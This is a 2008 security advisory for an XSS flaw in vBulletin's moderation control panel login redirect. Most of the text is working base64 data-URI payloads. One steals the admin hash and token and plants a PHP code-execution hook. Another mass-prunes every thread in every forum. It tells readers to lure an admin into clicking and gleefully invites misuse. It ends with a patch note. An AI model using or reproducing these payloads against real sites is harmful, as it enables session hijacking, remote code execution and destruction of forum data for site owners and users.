======================================================================
Advisory : XSS in modcp index
Release Date : June 17th 2008
Application : vBulletin
Version : vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1 and lower
Platform : PHP
Vendor URL : http://www.vbulletin.com/
Authors : Jessica Hope (jessicasaulhope_at_googlemail.com),
Friends who wish to remain anonymous.
=======================================================================
Overview
Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.
=======================================================================
Discussion
The XSS in question exists on the login page for the MCP (moderation
control panel).
The login script takes a redirect parameter that lacks sanitation, allowing a
rather easy XSS:
http://localhost/vB3/modcp/index.php?redirect={XSS}
What is even better is that the exploit will work outright if the
admin/moderator is already logged in;
if the admin/moderator is not, they will be required to log in.
However, if an admin
logs into the MCP, he is also logged into the ACP, allowing the same
exploit as last time
(remote PHP code injection via the hooks system).
If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin/moderator is logged in. A simple example of the above:
http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
In this case (as per the last case as well), you have an unlimited and
unaltered XSS space,
so you're free to invoke some AJAX and have fun.
Just to give ideas on how this could turn into something larger,
vBulletin has hooks that operate using eval(), and new hooks can
be added via the ACP itself. It is trivial to write some JS that not only
enables hooks but also inserts a nice RFI hook. Here's one using the data
URI:
data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3RvO3IyPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3NjcmlwdD4K
The above will survive a login prompt. It will then, once executed, proceed
to parse one of the ACP pages and extract the admin hash and token, then
it will enable hooks and add one that executes phpinfo().
Obviously the above requires an admin in this context. Similar techniques
could be used to exploit the modcp as usual, banning users, enabling the
pruning of threads etc.
If you want to cause annoyance, you can esally exploit just a
moderator (and thus have more
success in the exploit being run). This example enables pruning for
all forums on all posts:
data:text/html;base64,PHNjcmlwdD5ldmFsKCJ2PSdodHRwOi8vbG9jYWxob3N0L3ZCL21vZGNwL3RocmVhZC5waHA/ZG89Jzt1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz1uZXcgWE1MSHR0cFJlcXVlc3QoKTtyZWcub3BlbignR0VUJyx2KydwcnVuZScsZmFsc2UpO3JlZy5zZW5kKG51bGwpO3I9cmVnLnJlc3BvbnNlVGV4dDtoPScmYWRtaW5oYXNoPScrci5zdWJzdHIoci5pbmRleE9mKCdoYXNoXCInKSsxMywzMik7dG89JyZzZWN1cml0eXRva2VuPScrci5zdWJzdHIoci5pbmRleE9mKCd0b2tlblwiJykrMTQsNDApO3M9J3RocmVhZFsnO3QyPXMrJ29yaWdpbmFsZGF5c29sZGVyXT0wJicrcysnb3JpZ2luYWxkYXlzbmV3ZXJdPTAmJytzKydsYXN0ZGF5c29sZGVyXT0wJicrcysnbGFzdGRheXNuZXdlcl09MCYnK3MrJ3JlcGxpZXNsZWFzdF09MCYnK3MrJ3JlcGxpZXNtb3N0XT0tMSYnK3MrJ3ZpZXdzbGVhc3RdPTAmJytzKyd2aWV3c21vc3RdPS0xJicrcysnaXNzdGlja3ldPS0xJicrcysnc3RhdGVdPWFueSYnK3MrJ3N0YXR1c109YW55JicrcysnZm9ydW1pZF09LTEmJytzKydwb3N0ZWR1c2VyXT0mJytzKyd0aXRsZWNvbnRhaW5zXT0mJytzKydzdWJmb3J1bXNdPTEmdHlwZT1wcnVuZSZkbz1kb3RocmVhZHMnK2grdG87cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpO3g9cjIucmVzcG9uc2VUZXh0O3QyPSdkbz1kb3RocmVhZHNhbGwmdHlwZT1wcnVuZSYnK2grdG8rJyZjcml0ZXJpYT0nK2VzY2FwZSgoeC5zdWJzdHIoeC5pbmRleE9mKCdyaWEnKSsxMiw3NDcpKS5yZXBsYWNlKC8mcXVvdDsvZywnXCInKSk7cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzYWxsJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpOyIpOzwvc2NyaXB0Pg==
In order to exploit, just get an admin/moderator to click the link.
=======================================================================
Solution:
Update to 3.7.1 PL2 or 3.6.10 PL2
=======================================================================